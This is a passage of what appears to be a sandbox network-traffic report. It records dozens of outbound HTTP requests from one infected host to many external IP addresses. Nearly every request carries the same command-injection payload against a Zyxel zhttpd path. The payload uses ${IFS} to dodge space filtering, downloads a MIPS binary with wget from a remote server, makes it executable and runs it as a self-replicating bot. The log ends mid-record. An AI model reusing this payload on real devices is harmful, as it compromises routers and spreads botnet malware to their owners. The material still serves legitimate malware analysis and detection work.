                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432379007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1682192.168.2.153850281.186.21.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432415009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1683192.168.2.1551396150.145.251.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432461023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1684192.168.2.1539272217.106.116.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432482004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1685192.168.2.155586858.14.108.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432518005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1686192.168.2.155770084.242.25.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432549953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1687192.168.2.1542254213.94.45.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432573080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1688192.168.2.1538980219.74.88.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432610989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1689192.168.2.1534562128.131.134.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432637930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1690192.168.2.153747645.68.84.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432692051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1691192.168.2.1536356167.82.136.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432713032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1692192.168.2.1559902151.11.21.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432750940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1693192.168.2.155128077.113.144.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432790995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1694192.168.2.155801260.90.219.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432818890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1695192.168.2.154658878.246.172.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432853937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1696192.168.2.155788295.135.246.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432890892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1697192.168.2.1553504210.171.73.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432921886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1698192.168.2.1556336202.138.194.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432933092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1699192.168.2.1556172150.188.194.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432955980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1700192.168.2.153815612.0.191.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433008909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1701192.168.2.1545276221.119.163.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433039904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1702192.168.2.155398673.227.123.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433084965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1703192.168.2.1543242143.106.157.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433108091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1704192.168.2.154067277.182.195.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433147907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1705192.168.2.1559366183.243.214.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433190107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1706192.168.2.155339478.133.15.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433214903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1707192.168.2.1558676137.41.140.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433253050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1708192.168.2.154313052.22.53.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433283091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1709192.168.2.1558526164.56.235.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433336020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1710192.168.2.155737020.167.91.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433365107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1711192.168.2.155441445.6.13.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433399916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1712192.168.2.155596040.136.215.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433438063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1713192.168.2.1555990206.188.149.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433478117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1714192.168.2.153992641.221.44.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433496952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1715192.168.2.1534272218.192.156.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433522940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1716192.168.2.154120460.85.76.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433542967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1717192.168.2.1559534195.223.144.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433605909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1718192.168.2.154764270.136.226.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433625937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1719192.168.2.15581869.182.133.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433758974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1720192.168.2.1535944150.152.158.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433785915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1721192.168.2.1544514205.144.77.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433821917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1722192.168.2.1556946193.216.29.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433866024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1723192.168.2.1552952117.99.165.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433922052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1724192.168.2.1534826111.222.9.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433965921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1725192.168.2.155325036.217.93.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.433998108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1726192.168.2.1543494169.48.60.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434041023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1727192.168.2.1549788141.190.129.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434099913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1728192.168.2.1552730114.233.66.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434108019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1729192.168.2.1558986165.22.167.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434143066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1730192.168.2.1542774157.42.94.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434197903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1731192.168.2.1558616131.183.98.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434232950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1732192.168.2.1544618181.117.169.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434261084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1733192.168.2.1547456180.111.244.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434308052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1734192.168.2.1543100203.118.61.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434365988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1735192.168.2.1550882182.129.187.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434396029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1736192.168.2.1560594160.133.8.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434418917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1737192.168.2.154664895.77.161.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434465885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1738192.168.2.153840075.58.147.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434520960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1739192.168.2.154844079.123.128.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434547901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1740192.168.2.1540490163.8.116.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434575081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1741192.168.2.1539418121.5.78.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434602976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1742192.168.2.1541642132.172.140.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434640884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1743192.168.2.1550540196.88.16.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434662104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1744192.168.2.1542668154.14.34.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.434700012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1745192.168.2.1554434138.128.187.76443
                                            TimestampBytes transferredDirectionData
